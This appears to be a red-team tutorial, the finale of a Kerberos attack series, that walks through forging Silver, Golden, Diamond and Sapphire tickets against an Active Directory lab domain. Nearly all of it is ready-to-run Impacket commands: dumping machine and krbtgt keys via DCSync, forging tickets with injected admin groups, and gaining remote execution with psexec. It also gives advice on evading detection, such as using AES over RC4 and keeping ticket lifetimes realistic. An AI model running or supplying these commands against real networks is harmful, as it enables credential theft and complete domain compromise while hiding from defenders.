Active Directory
Kerberos
Red Team
OPSEC
Kerberos Attacks Part 3: Silver, Golden, Diamond & Sapphire Tickets
// part 3 · the finale of the Kerberos series
overview
The finale of the Kerberos series. Instead of stealing a ticket, you build your own. Ticket forging creates Kerberos tickets without going through normal authentication, letting you impersonate a user or service. Four types, from the service-scoped Silver to the domain-wide Golden, and the stealthier Diamond and Sapphire that start from a legitimate ticket.
commands used
// silver ticket
// pick your target SPN
| SPN / Service | Access / Capability | Required Key |
|---|---|---|
| CIFS | SMB shares / file system access | Host machine account |
| LDAP | LDAP operations; DC account key can enable DCSync | DC machine account |
| HOST + RPCSS | WMI | Host machine account |
| HOST + CIFS | PsExec-style execution, scheduled tasks | Host machine account |
| HOST + HTTP/WSMAN | WinRM / PowerShell Remoting | Host machine account |
| MSSQLSvc | SQL access as sysadmin | SQL service account |
get the domain SID
lookupsid.py controller.local/Administrator:'P@$$W0rd'@10.114.132.238 0
dump the machine account AES key (DCSync — noisy)
# DCSync triggers a directory replication request, normally DC-to-DC traffic.
# quieter methods exist, DCSync is used here for demonstration. grab the AES256 key.
secretsdump.py controller.local/Administrator:'P@$$W0rd'@10.114.132.238 \
-just-dc-user 'CONTROLLER-1$'
forge the silver ticket (offline)
# prefer AES, it blends with modern Kerberos traffic (RC4 stands out).
# set a realistic -duration, long default lifetimes get flagged.
ticketer.py -aesKey "38ad99bc...d3e3d2ed" \
-domain-sid "S-1-5-21-432953485-3795405108-1502158860" \
-domain "controller.local" \
-spn "cifs/controller-1.controller.local" \
"Administrator" -duration 600
load and use the ticket
export KRB5CCNAME=Administrator.ccache
smbclient.py -k -no-pass \
controller.local/Administrator@controller-1.controller.local
// golden ticket
dump the krbtgt AES key
secretsdump.py controller.local/Administrator:'P@$$W0rd'@10.114.132.238 \
-just-dc-user krbtgt
forge the golden ticket (offline)
# no -spn this time, a TGT works across services domain-wide
ticketer.py -aesKey "dfb51898...6acf1033" \
-domain-sid "S-1-5-21-432953485-3795405108-1502158860" \
-domain "controller.local" \
"Administrator" -duration 10
load and use the ticket
export KRB5CCNAME=Administrator.ccache
psexec.py -k -no-pass \
controller.local/Administrator@controller-1.controller.local
// diamond ticket
request a legit TGT and modify it into a diamond
# -request pulls a real TGT first, then rewrites the PAC with the groups you set.
# 512=Domain Admins, 513=Domain Users, 518/519/520=Schema/Enterprise/Group Policy admins
ticketer.py -request -domain "controller.local" \
-user "lowpriv1" -password 'Pass123!' \
-aesKey 'dfb51898...6acf1033' \
-domain-sid "S-1-5-21-432953485-3795405108-1502158860" \
-groups 512,513,518,519,520 lowpriv1
inspect, load and use
# describeTicket.py shows the ticket's contents (etype, flags, PAC)
export KRB5CCNAME=lowpriv1.ccache
describeTicket.py lowpriv1.ccache
psexec.py -k -no-pass \
controller.local/lowpriv1@controller-1.controller.local
// sapphire ticket
forge the sapphire ticket
# -impersonate triggers S4U2self+U2U to pull the target's real PAC.
# if you hit KDC_ERR_TGT_REVOKED, add -user-id with the target's RID.
ticketer.py -request -impersonate 'Administrator' \
-domain "controller.local" -user "lowpriv1" -password 'Pass123!' \
-aesKey 'dfb51898...6acf1033' \
-nthash '72cd714611b64cd4d5550cd2759db3f6' \
-domain-sid "S-1-5-21-432953485-3795405108-1502158860" lowpriv1
inspect, load and use
export KRB5CCNAME=lowpriv1.ccache
describeTicket.py lowpriv1.ccache
psexec.py -k -no-pass \
controller.local/Administrator@controller-1.controller.local